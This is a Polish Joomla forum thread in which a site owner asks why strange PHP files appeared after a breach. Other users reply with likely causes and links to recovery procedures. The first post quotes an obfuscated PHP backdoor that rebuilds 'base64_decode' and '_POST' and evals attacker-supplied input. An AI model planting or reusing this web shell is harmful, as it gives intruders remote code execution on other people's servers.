Pojawienie się dziwnych plików w katalogach z joomlą
Wyniki 1 do 4 z 4

Temat: Pojawienie się dziwnych plików w katalogach z joomlą

  1. #1
    Debiutant
    Dołączył
    16-05-2011
    Wpisy
    3
    Punkty
    10

    Joomla! 3.2 Pojawienie się dziwnych plików w katalogach z joomlą

    Mam na serwerze kilka serwisów na różnych systemach w tym joomla. Od 2 tygodni serwisy oparte o joomle zostały zaatakowane. W katalogach pojawiają się dziwne pliki gallery.php, object.php. 1 z serwisow ma pliki z takimi kodami:
    Kod PHP:
    $qjqw2"c6p4_sedobat"$stve0=strtolower($qjqw2[9].$qjqw2[10].$qjqw2[5].$qjqw2[6] . $qjqw2[1]. $qjqw2[3].$qjqw2[4].$qjqw2[7].$qjqw2[6].$qjqw2[0].$qjqw2[8].$qjqw2[7]. $qjqw2[6] ) ; $awcb3=strtoupper ($qjqw2[4].$qjqw2[2].$qjqw2[8]. $qjqw2[5].$qjqw2[11]); if(isset ( ${$awcb3} ['n42dabb' ])){eval($stve0(${ $awcb3}[ 'n42dabb' ])) ;} 
    Atak objawił się po przez wysyłanie spamu. Jaka jest przyczyna? Dostęp przez ftp ?

  2. Pani Reklamowa
    Pani Reklamowa jest aktywna
    Avatar Panny Google

    Dołączył
    19-08-2010
    Skąd
    Internet
    Postów
    milion
    Pochwał
    setki
  3. #2
    Wiarus tomaszek83 awatar
    Dołączył
    19-05-2008
    Skąd
    Gorzów Wlkp.
    Wpisy
    2 191
    Punkty
    167

    Domyślny

    Przyczyn może być wiele. Nieaktualny Joomla, rozszerzenie dziurawe, serwer dziurawy, FTP nie szyfrowane itp, itd, etc...

    Postępowanie po włamaniu masz tutaj

  4. #3
    Senior zwiastun awatar
    Dołączył
    20-09-2005
    Wpisy
    27 300
    Punkty
    1136

    Domyślny

    Pełny opis postępowania po włamaniu jest na stronie joomla.pl: http://www.joomla.pl/o-joomla/joomla...ie-po-wlamaniu
    Korzystaj i ciesz się!
    ===============
    Zwiastun
    Biblioteka Elektronicznej Dokumentacji Joomla!

  5. #4
    Senior Gall Anonim awatar
    Dołączył
    19-10-2010
    Wpisy
    6 943
    Punkty
    447

    Domyślny

    Miej - więcej na dwa tygodnie przed świętami nastąpiło potężne zwiększenie aktywności ataków na Joomla - odpowiedzią na twoje pytanie jest oznaczona przez ciebie wersja - ataki ukierunkowane były na wersje od 3.1.1 do 3.4.4 (o ile dobrze kojarzę) - racz zauważyć że w bardzo krótkim czasie nastąpiło szereg aktualizacji Joomla - ostatnia bodajże 24 grudnia - do wersji 3.4.8 Tak więc ewidentnie padłeś ofiarą ataku - procedury wskazane w postach powyżej.
    Pzdr

Podobne tematy

  1. Połączenie Joomla z Facebook - Automatyczne pojawienie się artykułu na Facebook'u
    przez orygano na forum Artykuły: aktualności, komentarze
    Odpowiedzi: 4
    Ostatni post/autor: 15-02-2017, 21:04
  2. jak powiązać pojawienie się modułu z artykułem?
    przez michxxx na forum Rozszerzenia - problemy z obsługą, zarządzaniem
    Odpowiedzi: 10
    Ostatni post/autor: 30-08-2012, 22:54
  3. Odpowiedzi: 2
    Ostatni post/autor: 27-01-2012, 18:54
  4. Samoistne pojawienie się reklam na stronie
    przez KARPIARZ na forum Administracja - ogólne
    Odpowiedzi: 15
    Ostatni post/autor: 05-01-2012, 17:45
  5. Laik prosi o pomoc z widocznością dziwnych parametrów
    przez Joomler_New na forum Administracja - ogólne
    Odpowiedzi: 2
    Ostatni post/autor: 20-03-2009, 19:04

Reguły pisania

  • Nie możesz zakładać nowych tematów
  • Nie możesz dodawać wypowiedzi
  • Nie możesz dodawać załączników
  • Nie możesz poprawiać swoich postów
  •